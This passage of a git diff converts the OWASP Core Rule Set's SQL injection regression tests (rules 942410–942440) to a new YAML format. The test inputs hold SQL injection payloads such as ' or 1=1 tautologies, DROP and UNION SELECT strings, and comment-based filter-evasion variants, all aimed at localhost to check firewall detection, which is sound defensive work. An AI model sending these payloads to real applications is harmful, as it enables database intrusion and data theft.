text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 96 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 97 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substring(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 98 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 99 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 100 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "time (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 101 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=time%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 102 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 103 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 104 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 105 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 106 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 107 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 108 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 109 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 110 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 111 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 112 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 113 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 114 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 115 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 116 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 117 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 118 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 576280e..b0d3ee0 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml 
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942420.yaml
+rule_id: 942420
 tests:
- - test_title: 942420-1
+ - test_id: 1
 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- version: HTTP/1.0
- output:
- log_contains: id "942420"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942420]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
index cca5bfa..4b71697 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942421.yaml
+rule_id: 942421
 tests:
- - test_title: 942421-1
+ - test_id: 1
 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- Cookie: "cookie=@@@@@@@@@@@@@"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942421"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Cookie: "cookie=@@@@@@@@@@@@@"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942421]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
index aa1a717..b8e7324 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942430.yaml
+rule_id: 942430
 tests:
- - test_title: 942430-1
+ - test_id: 1
 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=(((((())))))&var2=whatever"
- version: HTTP/1.0
- output:
- log_contains: id "942430"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=(((((())))))&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942430]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
index fb9b2e0..0254f21 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942431.yaml
+rule_id: 942431
 tests:
- - test_title: 942431-1
+ - test_id: 1
 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=-------------------&var2=whatever"
- version: HTTP/1.0
- output:
- log_contains: id "942431"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=-------------------&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942431]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
index b30a904..0a34adc 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 942432.yaml
+rule_id: 942432
 tests:
- - test_title: 942432-1
+ - test_id: 1
 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=;;dd foo bar"
- version: HTTP/1.0
- output:
- log_contains: id "942432"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=;;dd foo bar"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942432]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
index 508f028..7af4573 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
@@ -1,339 +1,337 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None - enabled: true - name: 942440.yaml +rule_id: 942440 tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log: + expect_ids: [942440] + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log: + expect_ids: [942440] + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
"POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log: + expect_ids: [942440] + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log: + expect_ids: [942440] + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + 
output: + log: + expect_ids: [942440] + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log: + expect_ids: [942440] + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" 
- port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log: + expect_ids: [942440] + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log: + expect_ids: [942440] + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + 
uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log: + expect_ids: [942440] + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log: + expect_ids: [942440] + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log: + expect_ids: [942440] + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - 
output: - log_contains: id "942440" - - test_title: 942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log: 
